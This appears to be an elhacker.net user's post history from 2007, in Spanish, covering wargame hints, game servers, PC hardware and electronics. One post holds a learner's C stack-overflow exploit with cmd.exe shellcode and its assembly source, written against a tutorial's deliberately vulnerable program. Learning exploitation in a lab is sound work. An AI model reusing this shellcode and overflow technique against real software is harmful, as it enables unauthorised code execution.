elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11
51  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 28 Julio 2007, 09:47 am

 
   Mira algo mas atras en este foro... a mi hades me dio una buena pista sobre la prueba.....piensa en q se relaciona la cocina y la informatica.....


   Saludos y suerte
52  Seguridad Informática / Bugs y Exploits / Re: <-> Taller de Stack Overflows en Windows, por Rojodos en: 27 Julio 2007, 09:28 am


   En el compilador le doy a ejecutar y me abre la shell...pero aunke le de a build no me sale ningun shell.exe...   cuando lo he ejecutado y pongo en la shell exit para cerrar la ventana msdos me sale el siguiente error:
   
  Debug error!
 
    program....
Module:
File: i386\chkesp.c
Line 42

    the value of ESP was not properly saved across a function call............

 De todas formas estoy empezando desde el principio... y releyendo el tuto....
Gracias por tu ayuda
53  Media / Juegos y Consolas / Re: Lineage 2 servidor en: 27 Julio 2007, 09:02 am


 No pq en principio ves en la descripcion cuales son en español, y si pinchas sobre la web, ves despues cuantos hay online en la mayoria de los server....

 Saludos
54  Media / Juegos y Consolas / Re: Lineage 2 servidor en: 26 Julio 2007, 20:02 pm


   www.xtremetop100.com/lineage2


ahi jejejj
saludos     
55  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 26 Julio 2007, 16:58 pm


  El server de warzone no va... :(  alguien sabe q pasa??????  durara mucho??????

  Gracias
56  Media / Juegos y Consolas / Re: Lineage 2 servidor en: 26 Julio 2007, 16:15 pm


  Ve al top 100 y alli tienes cientos de server... evidentemente cuanto mas arriba en el ranking mejores son.....  de los mas conocidos españoles y con muchos pj son el l2spain.....   Saludos
57  Media / Multimedia / Re: Maquina para realizar trabajos multimedia en: 24 Julio 2007, 10:47 am

   Hola..... puffff   pues realmente si que vas a necesitar una buena maquina, sobre todo con gran capacidad de almacenamiento y gran velocidad de transferencia de datos del disco duro.
   
   Basicamente busta scsi o sata 2 para los discos duros y procura que sean de un tamaño considerable. Tambien debes tener toooda la ram que puedas 4 gb estaria muy bien, y la consiguiente placa base que admita tanta memoria,etc.... la capturadora de video que uses para meter los videos en el ordenador tambien debes mirarlo muy bien ya que las gama baja no te valdran de nada, las gama media si y ya son caras y las buenas de verdad.....muyyyy  caras....  aunke en general el equipo que quieres montar es muy caro.
   Espero haberte orientado algo.  Saludos
58  Seguridad Informática / WarZone / Nuevo Mensaje en: 24 Julio 2007, 09:22 am


  Mira en el principio de este foro que hay info sobre molto facil que creo q es la que estas haciendo........     por lo general cuando pasas una prueba...... en esta es metiendo el pass correcto lo que sucede es q te sale un enlace con un codigo de validacion para que pinches sobre el.... despues se valora la prueba puntiuandola y ya esta..........
59  Seguridad Informática / Bugs y Exploits / Re: <-> Taller de Stack Overflows en Windows, por Rojodos en: 23 Julio 2007, 13:37 pm


    Hola, estoy realizando el exploit basico (gracias al texto de rojodos....impresionantemente bien explicado) y tengo el siguiente problema:

    Pego mi codigo antes de nada:
 
 
Código:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main (int argc,char **argv) {

    char evilbuffer[1024]="AAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPPQQQQRRRRSSSS";

    char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45"
"\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45\xF8\x50"
"\xBB\xC7\x93\xBF\x77\xFF\xD3"; [b] //EL OFFSET TAMBIEN LO HE PUESTO BIEN (xC7\x93\xBF\x77)  lo hago con el programa diceoffset [/b]

char offset[]="\x7C\x95\x1E\xED";  [b]  //HE SACADO ESTO EN MI PC CON FINDJMP[/b]
       
    strcat(evilbuffer,offset);
    strcat(evilbuffer,shellcode);
    printf ("Cadena + offset + shellcode en formato printable\n\n");
    printf ("%s", evilbuffer);

   
    argv[0] = "vulnerable";
    argv[1] = evilbuffer;
    argv[2] = NULL;
   
    execv ("vulnerable.exe",argv);
    }
El caso es que al ejecutarlo me peta diciendo: que la instruccion que hace referencia a una direccion de memoria no se puede read.

  Por otro lado, cuando compilo el shell y lo ejecuto se me abre correctamente la shell pero no se me genera el exe. Pego aki el codigo:

   
Código:
#include <stdio.h>
#include <windows.h>

void main () {

LoadLibrary("msvcrt.dll");
__asm{
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
lea eax,[ebp-08h]
push eax
mov ebx,0x77bf93c7
call ebx
}
}


   Saludos y gracias........
60  Informática / Electrónica / Re: Electrónica y mecánica mezclados! Duda en: 23 Julio 2007, 12:18 pm

  Busca sobre circuitos combinacionales (con eso puedes hacer sin problemas lo que buscas), pero tambien he de decirte que debes de conocer los voltajes que proporcionan los diferentes mecanismos de la moto para despues montar un circuito acorde con la moto.....   si no sabes mucho de electronica creo q acabas antes comprandotelo........ si te pica la curiosidad de todas formas.... montalo primero con una fuente normal para entender el funcionamiento y asi poder pasar despues ese montaje a tu moto. La electronica a ese nivel no es muy compleja pero debes tener claros muchos conceptos asi como saber diseñar circuitos combinacionales y tener las especificaciones de los chips que necesitaras para el montaje (osea por que patillas entran o salen valores, voltajes indicados, etc)


   Saludos
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines